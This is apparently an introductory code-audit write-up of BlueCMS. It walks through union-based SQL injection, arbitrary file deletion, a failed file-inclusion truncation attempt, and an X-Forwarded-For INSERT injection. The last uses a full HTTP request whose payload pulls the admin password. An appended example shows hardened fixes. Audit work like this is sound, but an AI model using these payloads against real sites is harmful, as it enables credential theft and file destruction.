This is an introductory code audit of a simple CMS; Seay was used for the automated audit.
SQL injection in the file uploads/ad_js.php
Here the ad_id parameter is taken from GET and, without any filtering, concatenated into the SQL statement and executed:
define('IN_BLUE', true);
require_once dirname(__FILE__) . '/include/common.inc.php';
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
echo 'Error!';
exit();
}
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
Following the getone function, the statement is executed directly:
function getall($sql, $type=MYSQL_ASSOC){
$rows = array();                          // avoids an undefined variable when no row matches
$query = $this->query($sql);              // $sql is run exactly as the caller built it
while($row = mysql_fetch_array($query,$type)){
$rows[] = $row;
}
return $rows;
}
To verify, request uploads/ad_js.php?ad_id=1' directly: the added single quote produces a database error, which indicates injection. Next, determine the number of columns:
uploads/ad_js.php?ad_id=1%20order%20by%207%20--+
order by 7 returns normally and order by 8 errors, so the query has 7 columns.
union select 1,2,3,4,5,6,7 --+
Column 7 is the displayed one; the rendered page shows nothing, so you must view the page source.
union select 1,2,3,4,5,6,user() --+
Shows the current database user.
Arbitrary file deletion in uploads/publish.php
elseif($act == 'del_pic')
{
$id = $_REQUEST['id'];
$db->query("DELETE FROM ".table('post_pic').
" WHERE pic_path='$id'");
if(file_exists(BLUE_ROOT.$id))
{
@unlink(BLUE_ROOT.$id);
}
}
The id (a filename) is taken from REQUEST, checked with file_exists and then deleted. To test, create 1.php under the uploads directory and request
uploads/publish.php?act=del_pic&id=1.php
Arbitrary file inclusion
elseif ($act == 'pay'){
include 'data/pay.cache.php';
$price = $_POST['price'];
$id = $_POST['id'];
$name = $_POST['name'];
if (empty($_POST['pay'])) {
showmsg('对不起，您没有选择支付方式');
}
include 'include/payment/'.$_POST['pay']."/index.php";
}
Here the POSTed pay value is included, but the directory prefix and the trailing /index.php are fixed, so truncation would be needed to reach another file.
%00 truncation failed (PHP 5.3.4 and later reject null bytes in include paths).
Try path-length truncation:
① Condition: on Windows the padding must exceed 256 bytes; on Linux, 4096 bytes.
On Windows the maximum path length is 256 bytes; anything beyond that is discarded.
On Linux the maximum path length is 4096 bytes; anything beyond that is discarded.
Pad with dots.
Not sure why none of these succeeded.
INSERT injection in the comment section: the IP header is written to the database without filtering, so by forging the IP header we can insert several rows at once and bring out the administrator's password.
include/comment.php
if($act == 'send')
{
if(empty($id))
{
return false;
}
$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
$mood = intval($_POST['mood']);
$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
$content = nl2br($content);
$type = intval($_POST['type']);
if(empty($content))
{
showmsg('评论内容不能为空');
}
if($_CFG['comment_is_check'] == 0)
{
$is_check = 1;
}
else
{
$is_check = 0;
}
$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)
VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')"; // getip() returns the client-supplied IP header without escaping
$db->query($sql);
if($type == 1)
{
$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
}
elseif($type == 0)
{
$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
}
}
Visit /uploads/comment.php?id=1
Post a comment, intercept the request with Burp and add an X-Forwarded-For header:
POST /uploads/comment.php?act=send HTTP/1.1
Host: www.blue1.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
X-Forwarded-For: 127.0.0.1','1'),('5', '1', '3', '0', '6', (select concat(admin_name,0x3e,pwd) from blue_admin), '1656396250', '127.0.0.1', '1')##
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://www.blue1.com:8080
Connection: close
Referer: http://www.blue1.com:8080/uploads/comment.php?id=1&type=0
Cookie: detail=5; PHPSESSID=83e76a6a5b87ec8abf5aa6639a8571e9
Upgrade-Insecure-Requests: 1
mood=6&comment=ccccccc&id=1&type=0&submit=%CC%E1%BD%BB%C6%C0%C2%DB
The data is extracted successfully.
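Added example, not BlueCMS code and not from the original post: hardened counterparts of the four sinks audited above (ad_js.php, the del_pic branch, the pay include, and the IP written by the comment INSERT), using mysqli prepared statements instead of the CMS's mysql_* wrapper. Assumed: $mysqli is a mysqli connection, BLUE_ROOT is the absolute web-root path, the blue_ table prefix (seen in blue_admin above), the data/upload directory and the payment-module names.

```php
<?php
// Added example, not BlueCMS code. Assumptions: $mysqli is a mysqli connection,
// BLUE_ROOT is the absolute web-root path, tables use the blue_ prefix.

// 1. ad_js.php: ad_id is an integer, so validate it and bind it instead of
//    concatenating the raw GET value into the query.
function get_ad(mysqli $mysqli, string $raw_ad_id): ?array {
    $ad_id = filter_var($raw_ad_id, FILTER_VALIDATE_INT);
    if ($ad_id === false || $ad_id <= 0) {
        return null;                        // the original's 'Error!' branch
    }
    $stmt = $mysqli->prepare("SELECT * FROM blue_ad WHERE ad_id = ?");
    $stmt->bind_param('i', $ad_id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// 2. publish.php act=del_pic: confine the target to the upload directory
//    (assumed data/upload) and only unlink a path the post_pic table knows.
function delete_pic(mysqli $mysqli, string $id): bool {
    $base   = realpath(BLUE_ROOT . 'data/upload');
    $target = realpath(BLUE_ROOT . $id);
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;                       // traversal or file outside uploads
    }
    $stmt = $mysqli->prepare("DELETE FROM blue_post_pic WHERE pic_path = ?");
    $stmt->bind_param('s', $id);
    $stmt->execute();
    return $stmt->affected_rows > 0 && unlink($target);
}

// 3. act=pay: map the POSTed name onto a fixed list of shipped modules, so no
//    user-controlled string ever reaches include().
function payment_module(string $pay): ?string {
    $allowed = ['alipay', 'tenpay'];        // assumed module names
    return in_array($pay, $allowed, true) ? "include/payment/$pay/index.php" : null;
}

// 4. getip(): X-Forwarded-For is client-controlled, so validate it as an IP
//    address and fall back to REMOTE_ADDR before it is written to the comment row.
function client_ip(array $server): string {
    $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? '')[0]);
    if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
        return $first;
    }
    return filter_var($server['REMOTE_ADDR'] ?? '', FILTER_VALIDATE_IP) ?: '0.0.0.0';
}
```

With client_ip() the forged X-Forwarded-For header from the request above fails IP validation and never reaches the INSERT, and the bound parameters in get_ad() and delete_pic() make the order by / union payloads and the 1.php deletion non-starters.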